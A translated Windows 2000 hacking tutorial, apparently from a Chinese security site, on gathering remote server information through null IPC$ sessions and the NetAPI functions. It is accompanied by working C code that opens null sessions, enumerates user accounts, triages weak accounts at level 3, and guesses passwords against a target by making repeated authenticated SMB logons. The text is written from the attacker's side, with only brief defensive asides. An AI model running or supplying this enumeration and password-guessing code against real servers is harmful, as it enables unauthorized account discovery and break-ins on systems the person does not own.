Gathering remote Windows 2000 server system information | http://www.cshu.net

Gathering remote Windows 2000 server system information
www.cshu.net  2002-11-8  fog rain village

Think about it: the functionality Windows 2000 provides really is powerful, and it makes the administrator's job a great deal easier. But advantages and disadvantages always go together, and precisely because Windows 2000 offers so much, a moment's inattention is enough for the system to get a visit from hackers. An exposed system is a very frightening thing: it means the attacker already knows half of what there is to know about your server, and as soon as a vulnerability is found, the next step is the intrusion itself. A simple example: if your server happens to be running a shared folder, and an attacker who has found a way to obtain your server's information discovers that the share is accessible, ha-ha, it is quite possible he simply puts it to his own use... After all that talk, what system information can be obtained remotely? A great deal. Without trying to be complete, here is the essential part:
Server Name: the server's name.
Server Comment: the descriptive comment attached to the server. Many administrators like to write sensitive information here :)
Server Type: the server type. From this the hacker can judge what environment the target is running in, for instance: a LAN Manager workstation, a LAN Manager server, a Windows NT/Windows 2000 workstation or server, a Windows NT/Windows 2000 server that is not a domain controller, a server running the browser service as backup, or a server running the master browser service.
Major_version / Minor_version: the major and minor version numbers of the operating system. From these the hacker learns the OS version: a major version of 5 with a minor version of 0, for instance, identifies Windows 2000, and the next step is to look up the Windows 2000 security vulnerabilities.
Current date, current time: the server's own date and time. From these one can judge which time zone the server is in, which helps in choosing the moment for the penetration.
Session: obtains the IP addresses of the sessions currently connected to the server (NetSessionEnum). This has many uses; apply it flexibly according to the situation.
Share Enum: very important information. It lists every shared folder on the server, hidden shares included (NetShareEnum). Once a usable share has been found, the hacker only needs to type \\ip\share into Explorer to reach the target host's shares. That is how dangerous it is!
UserEnum: this one is even scarier. It brings back all of the server's account information (NetUserEnum): the user's number of successful logons, number of failed logons, account expiry, logon script path, password age... and the administrators of these servers are completely in the dark about it! Other details are exposed as well, for instance the user name, the user's privilege level, the user comment, whether the account expires... This makes weak-password accounts very easy to crack: a brand-new administrator who leaves an account such as user test with password 123 on the box can expect the server not to survive.
LocalGroupEnum: enumerates the local groups (NetLocalGroupEnum), ha-ha ~ ~
On top of that there are UseEnum, FileEnum, ScheduleJobEnum... really too many to list ~
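The Server Type and Major_version / Minor_version fields above are bit flags and packed numbers, not text. The following added example (written for this edit, not code from the original article) decodes them into one readable line. On Windows the fields come from NetServerGetInfo at level 101 (SERVER_INFO_101), which works over a null session when the target permits it; off Windows only the decoder compiles, with the SV_TYPE_* constants repeated from lmserver.h. The os_name table covers only the versions this article is about (NT 4.0, 2000, XP).

```c
/* Added example (not from the original article): decode the fields behind
 * "Server Type" and "Major_version / Minor_version" into one line of text.
 * On Windows they are read with NetServerGetInfo level 101 (SERVER_INFO_101);
 * elsewhere only the decoder compiles, using the SV_TYPE_* values repeated
 * from <lmserver.h>. */
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#  include <windows.h>
#  include <lm.h>
#  pragma comment(lib, "netapi32.lib")
#endif

#ifndef SV_TYPE_WORKSTATION            /* off Windows: same values as lmserver.h */
#  define MAJOR_VERSION_MASK         0x0FUL
#  define SV_TYPE_WORKSTATION        0x00000001UL
#  define SV_TYPE_SERVER             0x00000002UL
#  define SV_TYPE_SQLSERVER          0x00000004UL
#  define SV_TYPE_DOMAIN_CTRL        0x00000008UL
#  define SV_TYPE_DOMAIN_BAKCTRL     0x00000010UL
#  define SV_TYPE_NT                 0x00001000UL
#  define SV_TYPE_SERVER_NT          0x00008000UL
#  define SV_TYPE_POTENTIAL_BROWSER  0x00010000UL
#  define SV_TYPE_BACKUP_BROWSER     0x00020000UL
#  define SV_TYPE_MASTER_BROWSER     0x00040000UL
#  define SV_TYPE_TERMINALSERVER     0x02000000UL
#endif

static const char *os_name(unsigned long major, unsigned long minor)
{
    if (major == 4 && minor == 0) return "Windows NT 4.0";
    if (major == 5 && minor == 0) return "Windows 2000";
    if (major == 5 && minor == 1) return "Windows XP (Whistler)";
    return "unknown Windows version";
}

/* Writes "<os> (<major>.<minor>): <role>, <role>, ..." into out and returns
 * the number of recognised SV_TYPE_* bits. Only the low 4 bits of the major
 * version are the version number; the high bits carry other type flags. */
int describe_server(unsigned long major, unsigned long minor,
                    unsigned long type, char *out, size_t outlen)
{
    static const struct { unsigned long bit; const char *text; } names[] = {
        { SV_TYPE_WORKSTATION,       "LAN Manager workstation" },
        { SV_TYPE_SERVER,            "LAN Manager server" },
        { SV_TYPE_SQLSERVER,         "SQL Server" },
        { SV_TYPE_DOMAIN_CTRL,       "primary domain controller" },
        { SV_TYPE_DOMAIN_BAKCTRL,    "backup domain controller" },
        { SV_TYPE_NT,                "Windows NT/2000 family" },
        { SV_TYPE_SERVER_NT,         "NT/2000 server that is not a domain controller" },
        { SV_TYPE_POTENTIAL_BROWSER, "potential browser" },
        { SV_TYPE_BACKUP_BROWSER,    "backup browser" },
        { SV_TYPE_MASTER_BROWSER,    "master browser" },
        { SV_TYPE_TERMINALSERVER,    "terminal server" },
    };
    int n = 0;
    size_t i, used;
    major &= MAJOR_VERSION_MASK;
    snprintf(out, outlen, "%s (%lu.%lu)", os_name(major, minor), major, minor);
    for (i = 0; i < sizeof names / sizeof names[0]; i++) {
        if (!(type & names[i].bit)) continue;
        used = strlen(out);
        snprintf(out + used, used < outlen ? outlen - used : 0,
                 "%s%s", n == 0 ? ": " : ", ", names[i].text);
        n++;
    }
    return n;
}

#ifdef _WIN32
/* Query the target (argv[1] = IP address) over an existing null session and
 * print the decoded line together with the server comment. */
int main(int argc, char **argv)
{
    WCHAR server[MAX_PATH];
    LPSERVER_INFO_101 info = NULL;
    char text[512];
    NET_API_STATUS st;
    if (argc < 2) { fprintf(stderr, "usage: %s <ip>\n", argv[0]); return 1; }
    swprintf(server, MAX_PATH, L"\\\\%hs", argv[1]);
    st = NetServerGetInfo(server, 101, (LPBYTE *)&info);
    if (st != NERR_Success) { fprintf(stderr, "NetServerGetInfo failed: %lu\n", st); return 1; }
    describe_server(info->sv101_version_major, info->sv101_version_minor,
                    info->sv101_type, text, sizeof text);
    wprintf(L"%s  comment: \"%s\"\n", info->sv101_name, info->sv101_comment);
    printf("%s\n", text);
    NetApiBufferFree(info);
    return 0;
}
#endif
```

A Windows 2000 member server that is also the segment's master browser reports type 0x59003 (workstation, server, NT, server-not-DC, potential browser, master browser) and decodes to "Windows 2000 (5.0): LAN Manager workstation, LAN Manager server, Windows NT/2000 family, NT/2000 server that is not a domain controller, potential browser, master browser".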
Now for the most important part: how is all this information obtained? Open your winnt\system32 folder and look for a file called netapi32.dll. As the file name says, this is the dynamic link library for the network functions, and it is exactly what we need: every piece of information listed above is in fact obtained through this DLL. Windows 2000 provides a group of API functions that call into it. Install the Platform SDK, open MSDN, search for the keyword "Network Management", then choose Network Management Reference -> Network Management Functions, and you will see a group of API functions whose names begin with Net. Used correctly, these functions obtain the remote server's information. Their use is a little involved, so here is a simple example:
Suppose there is a Windows 2000 target host with IP address 192.168.10.111 and we want its account information. First we establish a null session (an empty IPC connection) to it. Establishing and tearing down the null session mainly uses two functions:

    DWORD WNetAddConnection2(LPNETRESOURCE lpNetResource, LPCTSTR lpPassword, LPCTSTR lpUsername, DWORD dwFlags);

This function establishes a session. lpPassword and lpUsername are the password and the user name; to establish a null session, both must be set to the empty string.

    DWORD WNetCancelConnection2(LPCTSTR lpName, DWORD dwFlags, BOOL fForce);

WNetCancelConnection2 is the opposite of WNetAddConnection2: once the user information has been obtained, the hacker disconnects his session from the server as quickly as possible, for safety's sake.
I have already written this into a class; the following is the relevant part of that class, shown with the headers it needs and with the share name written out as IPC$ (the inter-process communication share that accepts null sessions). The explicit ...A variants of the functions are used so that the char buffers match regardless of whether UNICODE is defined:

    #include <windows.h>
    #include <winnetwk.h>
    #include <stdio.h>
    #pragma comment(lib, "mpr.lib")

    class CAhFunc {
    public:
        BOOL CreateLine(char *str);
        BOOL DestoryLine(char *str);
    };

    BOOL CAhFunc::CreateLine(char *str)
    {
        NETRESOURCEA netr;
        char netBuf[MAX_PATH] = {0};
        memset(&netr, 0, sizeof(NETRESOURCEA));
        // everything above is just initialisation
        wsprintfA(netBuf, "\\\\%s\\IPC$", str);
        // the line above produces the string "\\xxx.xxx.xxx.xxx\IPC$"
        netr.dwScope = RESOURCE_GLOBALNET;
        netr.dwType = RESOURCETYPE_ANY;
        netr.lpLocalName = NULL;        // no drive letter: a connection only
        netr.lpRemoteName = netBuf;
        netr.lpProvider = NULL;
        // OK! Stop here: that is all it takes to set up the IPC connection. The
        // empty user name and empty password make it a null session; what the
        // call does is simulate the Windows NT/2000 command
        //     net use \\xxx.xxx.xxx.xxx\IPC$ "" /user:""
        // (for the exact usage of net use, have a look at its help)
        if (WNetAddConnection2A(&netr, "", "", 0) == NO_ERROR)
            return TRUE;
        return FALSE;
    }

Below is the method that disconnects the session. The name passed to WNetCancelConnection2 must be the same remote name the connection was made with:

    BOOL CAhFunc::DestoryLine(char *str)
    {
        char netNB[MAX_PATH] = {0};
        wsprintfA(netNB, "\\\\%s\\IPC$", str);
        // dwFlags 0: the connection was never saved in the profile, so there
        // is nothing to update; fForce TRUE drops it even if files are open
        if (WNetCancelConnection2A(netNB, 0, TRUE) == NO_ERROR)
            return TRUE;
        return FALSE;
    }

Likewise, this simulates the command net use \\xxx.xxx.xxx.xxx\IPC$ /DEL
As said above, what we want is the account information on the remote server. Open MSDN and enter the keyword NetUserEnum; found it? You will see this function:

    NET_API_STATUS NetUserEnum(LPCWSTR servername, DWORD level, DWORD filter, LPBYTE *bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resume_handle);

A long string of parameters; looks frightening, doesn't it? :) No problem, we take them one at a time:

LPCWSTR servername: note that this parameter requires data of type LPCWSTR, in other words a Unicode (wide-character) string. If you assign an ordinary string to it directly it will certainly not work; you have to take a small detour through this function:

    int MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar);

Its job is to convert a single-byte (ANSI) string into a wide-character string, two bytes per character.

DWORD level: specifies the information level. Different levels require different access rights on the target, and each level returns a different amount of system information. According to the MSDN description, the following levels can be chosen:

0
At this level you obtain the user account names. They are stored in USER_INFO_0 structures, and this level is usable over a null IPC session.
1
Return detailed information about user accounts. The bufptr parameter points to an array of USER_INFO_1 structures.
2
Return level one information and additional attributes about user accounts. The bufptr parameter points to an array of USER_INFO_2 structures.
3
Return level two information and additional attributes about user accounts. This level is valid only on Windows NT/Windows 2000 servers. The bufptr parameter points to an array of USER_INFO_3 structures. Note that on Whistler and later, it is recommended that you use USER_INFO_4 instead.
4
Whistler: Return level two information and additional attributes about user accounts. This level is valid only on Windows NT/Windows 2000 servers. The bufptr parameter points to an array of USER_INFO_4 structures.
10
Return user and account names and comments. The bufptr parameter points to an array of USER_INFO_10 structures.
11
Return detailed information about user accounts. The bufptr parameter points to an array of USER_INFO_11 structures.
20
Return the user's name and identifier and various account attributes. The bufptr parameter points to an array of USER_INFO_20 structures. Note that on Whistler and later, it is recommended that you use USER_INFO_23 instead.
23
Whistler: Return the user's name and identifier and various account attributes. The bufptr parameter points to an array of USER_INFO_23 structures.

Over a null session to the host, every level except 4 and 23 can be used; 4 and 23 are reserved, Windows 2000 does not yet support them, and they are kept for the later Windows XP. Whether the null session returns anything at all also depends on the target's RestrictAnonymous value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa: when it is set to 1 or 2, anonymous enumeration of accounts is refused and NetUserEnum comes back with ERROR_ACCESS_DENIED. Good, with the above information we can start writing the program. To avoid being accused of padding the article, the example uses the simplest level, 0; at that level you only get the system's account names, but for a hacker that is already enough :)
    #include <windows.h>
    #include <lm.h>
    #include <stdio.h>
    #pragma comment(lib, "netapi32.lib")

    // str is the target's IP address as an ordinary (single-byte) string; a
    // null session to \\str\IPC$ must already exist (see CreateLine above)
    void EnumUsers(char *str)
    {
        char netNB[MAX_PATH] = {0};
        sprintf(netNB, "\\\\%s", str);
        WCHAR lpwStr[MAX_PATH] = {0};
        MultiByteToWideChar(CP_ACP, 0, netNB, -1, lpwStr, MAX_PATH);
        // ha-ha, look at the line above: it converts the single-byte string
        // into a wide-character one, which is what NetUserEnum wants

        LPUSER_INFO_0 pBuf_0 = NULL;
        LPUSER_INFO_0 pTmpBuf_0;
        DWORD dwLevel = 0;                         // level 0: account names only
        DWORD dwPrefMaxLen = MAX_PREFERRED_LENGTH; // let the API size the buffer
        DWORD dwEntriesRead = 0;
        DWORD dwTotalEntries = 0;
        DWORD dwResumeHandle = 0;
        DWORD i;
        DWORD dwTotalCount = 0;
        NET_API_STATUS nStatus;

        do
        {
            nStatus = NetUserEnum(lpwStr,
                                  dwLevel,
                                  FILTER_NORMAL_ACCOUNT, // global users
                                  (LPBYTE*)&pBuf_0,
                                  dwPrefMaxLen,
                                  &dwEntriesRead,
                                  &dwTotalEntries,
                                  &dwResumeHandle);
            // If the call succeeds,
            if ((nStatus == NERR_Success) || (nStatus == ERROR_MORE_DATA))
            {
                if ((pTmpBuf_0 = pBuf_0) != NULL)
                {
                    // Loop through the entries.
                    for (i = 0; i < dwEntriesRead; i++)
                    {
                        if (pTmpBuf_0 == NULL)
                        {
                            fprintf(stderr, "An access violation has occurred\n");
                            break;
                        }
                        // Print the name of the user account. Note that this is
                        // wide-character output; printf("username:%S\n",
                        // pTmpBuf_0->usri0_name) would do the same, %S meaning a
                        // wide string and %s a single-byte one. What comes out
                        // are the user accounts on the remote host.
                        wprintf(L"username:%s\n", pTmpBuf_0->usri0_name);

                        pTmpBuf_0++;
                        dwTotalCount++;
                    }
                }
            }
            else
                printf("A system error has occurred: %lu\n", nStatus);
            // Free the buffer the API allocated before fetching the next page
            if (pBuf_0 != NULL)
            {
                NetApiBufferFree(pBuf_0);
                pBuf_0 = NULL;
            }
        } while (nStatus == ERROR_MORE_DATA); // end do
    }
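Level 0 gives names only. The UserEnum section earlier lists what level 3 adds (logon counts, failed logons, account expiry, logon script, password age, comment), and that is where the weak accounts show up. The following added example (written for this edit, not code from the article) is the triage I would run over those USER_INFO_3 records: a bitmask of findings per account. On Windows the structure comes from lm.h and main() enumerates a target at level 3 over an existing null session; off Windows a stand-in structure with the same member names is defined so the triage function compiles. The 90-day password age and the threshold of three failed logons are assumptions for the example, not values from the article.

```c
/* Added example (not from the original article): triage of the per-account
 * fields that UserEnum returns at information level 3. On Windows the real
 * USER_INFO_3 comes from <lm.h>; elsewhere a stand-in with the same member
 * names is defined so the triage function compiles and can be tested. */
#include <stdio.h>
#include <wchar.h>

#ifdef _WIN32
#  include <windows.h>
#  include <lm.h>
#  pragma comment(lib, "netapi32.lib")
#else
typedef unsigned long DWORD;
typedef wchar_t *LPWSTR;
typedef struct _USER_INFO_3 {      /* the subset of the real structure used here */
    LPWSTR usri3_name;
    DWORD  usri3_password_age;     /* seconds since the password was last changed */
    DWORD  usri3_flags;            /* UF_* bits */
    LPWSTR usri3_script_path;
    LPWSTR usri3_comment;
    DWORD  usri3_last_logon;       /* seconds since 1970-01-01, 0 = unknown/never */
    DWORD  usri3_num_logons;
    DWORD  usri3_bad_pw_count;
    DWORD  usri3_acct_expires;     /* TIMEQ_FOREVER = never */
} USER_INFO_3, *LPUSER_INFO_3;
#  define UF_ACCOUNTDISABLE     0x0002UL
#  define UF_LOCKOUT            0x0010UL
#  define UF_PASSWD_NOTREQD     0x0020UL
#  define UF_DONT_EXPIRE_PASSWD 0x10000UL
#  define TIMEQ_FOREVER         ((unsigned long)-1L)
#endif

enum {
    F_DISABLED        = 1 << 0,  /* account is disabled */
    F_LOCKED_OUT      = 1 << 1,  /* currently locked out */
    F_NO_PASSWORD     = 1 << 2,  /* UF_PASSWD_NOTREQD: an empty password is allowed */
    F_NEVER_EXPIRES   = 1 << 3,  /* password never expires */
    F_STALE_PASSWORD  = 1 << 4,  /* password older than max_age_days */
    F_NEVER_LOGGED_ON = 1 << 5,  /* account exists but was never used */
    F_BAD_PW_COUNT    = 1 << 6,  /* repeated failed logons: somebody is guessing */
    F_COMMENT_LEAK    = 1 << 7   /* comment looks like it contains a password */
};

/* Returns a bitmask of F_* findings for one account record. */
unsigned triage_user(const USER_INFO_3 *u, DWORD max_age_days)
{
    unsigned f = 0;
    if (u->usri3_flags & UF_ACCOUNTDISABLE)     f |= F_DISABLED;
    if (u->usri3_flags & UF_LOCKOUT)            f |= F_LOCKED_OUT;
    if (u->usri3_flags & UF_PASSWD_NOTREQD)     f |= F_NO_PASSWORD;
    if (u->usri3_flags & UF_DONT_EXPIRE_PASSWD) f |= F_NEVER_EXPIRES;
    if (u->usri3_password_age > max_age_days * 86400UL) f |= F_STALE_PASSWORD;
    if (u->usri3_num_logons == 0 && u->usri3_last_logon == 0) f |= F_NEVER_LOGGED_ON;
    if (u->usri3_bad_pw_count >= 3)             f |= F_BAD_PW_COUNT;
    if (u->usri3_comment != NULL && (wcsstr(u->usri3_comment, L"pass") != NULL ||
                                     wcsstr(u->usri3_comment, L"pwd") != NULL))
        f |= F_COMMENT_LEAK;
    return f;
}

/* Constructed sample record (not real data), shaped like what the API
 * returns: the "user:test, password:123" account the article warns about. */
unsigned triage_sample(void)
{
    USER_INFO_3 u = {0};
    u.usri3_name = L"test";
    u.usri3_password_age = 200UL * 86400UL;        /* 200 days old */
    u.usri3_flags = UF_DONT_EXPIRE_PASSWD | UF_PASSWD_NOTREQD;
    u.usri3_script_path = L"";
    u.usri3_comment = L"temp account, pass is 123";
    u.usri3_bad_pw_count = 7;
    u.usri3_acct_expires = TIMEQ_FOREVER;
    return triage_user(&u, 90);                    /* -> 0xfc */
}

#ifdef _WIN32
/* Enumerate every normal account of argv[1] at level 3 and print its
 * findings. A null session to \\ip\IPC$ must already exist (CreateLine). */
int main(int argc, char **argv)
{
    WCHAR server[MAX_PATH];
    LPUSER_INFO_3 buf = NULL;
    DWORD read = 0, total = 0, resume = 0, i;
    NET_API_STATUS st;
    if (argc < 2) { fprintf(stderr, "usage: %s <ip>\n", argv[0]); return 1; }
    swprintf(server, MAX_PATH, L"\\\\%hs", argv[1]);
    do {
        st = NetUserEnum(server, 3, FILTER_NORMAL_ACCOUNT, (LPBYTE *)&buf,
                         MAX_PREFERRED_LENGTH, &read, &total, &resume);
        if (st != NERR_Success && st != ERROR_MORE_DATA) {
            /* 5 (ERROR_ACCESS_DENIED) usually means RestrictAnonymous is set */
            fprintf(stderr, "NetUserEnum failed: %lu\n", st);
            break;
        }
        for (i = 0; i < read; i++)
            wprintf(L"%-20s findings=0x%02x bad_pw=%lu\n", buf[i].usri3_name,
                    triage_user(&buf[i], 90), buf[i].usri3_bad_pw_count);
        if (buf) { NetApiBufferFree(buf); buf = NULL; }
    } while (st == ERROR_MORE_DATA);
    return 0;
}
#endif
```

The same function is just as useful run locally by the administrator against his own box (servername NULL) before an attacker runs it from outside: any account with F_NO_PASSWORD, F_NEVER_EXPIRES or F_COMMENT_LEAK set is exactly the kind of account the article says will get the server taken.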
If you want, you can also design rules for probing weak passwords. For instance, if there is a user named test, try the passwords "", "test", "test123", "t", "123"... The more elaborate the rule, the higher the success rate! The X-Scan everybody is familiar with obtains remote host information with exactly this method, and its password probing is implemented the same way.
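The rule above in working form, as an added example written for this edit (not code from the article or from X-Scan): build_candidates produces the article's five guesses for a user name and then the obvious extensions (lower case, reversed, name1, name!, 123456), and guess_password feeds them to a caller-supplied logon function until one succeeds. Off Windows a constructed table of accounts stands in for the target so the driver can be exercised; on Windows the logon function is WNetAddConnection2A against \\ip\IPC$, one SMB session per candidate. Two things the article does not say but that matter in practice: a null session already open to the same host makes the authenticated attempt fail with ERROR_SESSION_CREDENTIAL_CONFLICT, so cancel it first; and every wrong guess increments the account's bad_pw_count, so an account lockout policy stops this after a handful of attempts (the driver aborts when it sees ERROR_ACCOUNT_LOCKED_OUT).

```c
/* Added example (not from the original article): the weak-password rule
 * generalised a little, plus a driver that tries the candidates through a
 * caller-supplied logon function. Off Windows a constructed account table
 * stands in for the target. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define CAND_LEN 64

static void add_candidate(char (*out)[CAND_LEN], size_t *n, size_t max, const char *s)
{
    size_t i;
    if (*n >= max || strlen(s) >= CAND_LEN) return;
    for (i = 0; i < *n; i++)
        if (strcmp(out[i], s) == 0) return;      /* skip duplicates */
    strcpy(out[(*n)++], s);
}

/* Fills out[] with candidates derived from the user name; returns how many.
 * The first five are the article's rule ("", name, name123, first letter,
 * 123); the rest are the obvious extensions. */
size_t build_candidates(const char *user, char (*out)[CAND_LEN], size_t max)
{
    size_t n = 0, len = strlen(user), i;
    char tmp[CAND_LEN];
    if (len == 0 || len + 4 >= CAND_LEN) return 0;
    add_candidate(out, &n, max, "");
    add_candidate(out, &n, max, user);
    snprintf(tmp, sizeof tmp, "%s123", user); add_candidate(out, &n, max, tmp);
    tmp[0] = user[0]; tmp[1] = '\0';          add_candidate(out, &n, max, tmp);
    add_candidate(out, &n, max, "123");
    for (i = 0; i < len; i++) tmp[i] = (char)tolower((unsigned char)user[i]);
    tmp[len] = '\0';                          add_candidate(out, &n, max, tmp);
    for (i = 0; i < len; i++) tmp[i] = user[len - 1 - i];
    tmp[len] = '\0';                          add_candidate(out, &n, max, tmp);
    snprintf(tmp, sizeof tmp, "%s1", user);   add_candidate(out, &n, max, tmp);
    snprintf(tmp, sizeof tmp, "%s!", user);   add_candidate(out, &n, max, tmp);
    add_candidate(out, &n, max, "123456");
    return n;
}

/* try_fn returns 1 on success, 0 on failure, <0 to abort (e.g. lockout).
 * Returns the index of the candidate that worked, -1 if none, -2 if aborted. */
int guess_password(const char *user,
                   int (*try_fn)(const char *user, const char *pw, void *ctx),
                   void *ctx, char *found, size_t found_len)
{
    char cands[16][CAND_LEN];
    size_t n = build_candidates(user, cands, 16), i;
    for (i = 0; i < n; i++) {
        int r = try_fn(user, cands[i], ctx);
        if (r < 0) return -2;
        if (r > 0) {
            if (found && found_len) {
                strncpy(found, cands[i], found_len - 1);
                found[found_len - 1] = '\0';
            }
            return (int)i;
        }
    }
    return -1;
}

/* Constructed stand-in for a target: a table of accounts and passwords. */
struct account { const char *user, *pw; };
static int table_try(const char *user, const char *pw, void *ctx)
{
    const struct account *a;
    for (a = (const struct account *)ctx; a->user != NULL; a++)
        if (strcmp(a->user, user) == 0) return strcmp(a->pw, pw) == 0;
    return 0;
}

int demo_guess(const char *user, char *found, size_t found_len)
{
    static const struct account table[] = {   /* constructed sample data */
        { "test", "test123" }, { "admin", "" }, { "bob", "Zx9!qW" }, { NULL, NULL }
    };
    return guess_password(user, table_try, (void *)table, found, found_len);
}

#ifdef _WIN32
#include <windows.h>
#pragma comment(lib, "mpr.lib")
/* Real attempt: one authenticated SMB session to \\ip\IPC$ per candidate. */
static int ipc_try(const char *user, const char *pw, void *ctx)
{
    char remote[MAX_PATH];
    NETRESOURCEA nr;
    DWORD rc;
    snprintf(remote, sizeof remote, "\\\\%s\\IPC$", (const char *)ctx);
    memset(&nr, 0, sizeof nr);
    nr.dwType = RESOURCETYPE_ANY;
    nr.lpRemoteName = remote;
    rc = WNetAddConnection2A(&nr, pw, user, 0);
    if (rc == NO_ERROR) { WNetCancelConnection2A(remote, 0, TRUE); return 1; }
    return rc == ERROR_ACCOUNT_LOCKED_OUT ? -1 : 0;
}
int main(int argc, char **argv)
{
    char found[CAND_LEN];
    int idx;
    if (argc < 3) { fprintf(stderr, "usage: %s <ip> <user>\n", argv[0]); return 1; }
    idx = guess_password(argv[2], ipc_try, argv[1], found, sizeof found);
    if (idx >= 0) printf("%s: password \"%s\" (candidate %d)\n", argv[2], found, idx);
    else printf("%s: %s\n", argv[2], idx == -2 ? "locked out, stopped" : "no weak password found");
    return 0;
}
#endif
```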


Origin: Ttian